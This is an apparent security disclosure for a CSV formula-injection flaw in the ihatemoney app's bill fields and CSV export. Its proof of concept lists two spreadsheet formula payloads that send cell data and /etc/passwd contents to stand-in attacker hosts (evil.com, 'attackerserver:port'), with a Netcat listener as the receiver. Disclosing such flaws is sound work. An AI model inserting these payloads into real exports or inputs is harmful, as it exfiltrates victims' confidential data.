Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in spiral-project/ihatemoney
May 7th 2022
Formula Injection/CSV Injection in "For what?" , "For whom?" & "How much?" due to Improper Neutralization of Formula Elements in CSV File.
Proof of Concept
1.Visit https://ihatemoney.org/ and start your demo application then click on add new bill at the top right. In the field of "what" insert the below payloads.
=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")
=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "poc") // & Start your python server or Netcat listener.
3.Then Go to the settings at the right top option and scroll to the bottom having download the project's data feature
4.Select "CSV" in "Format" to download.
5 . Open the downloaded CSV and click on POC and Error fetching info: Click me to resolve. user will get redirected to evil.com.
Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data.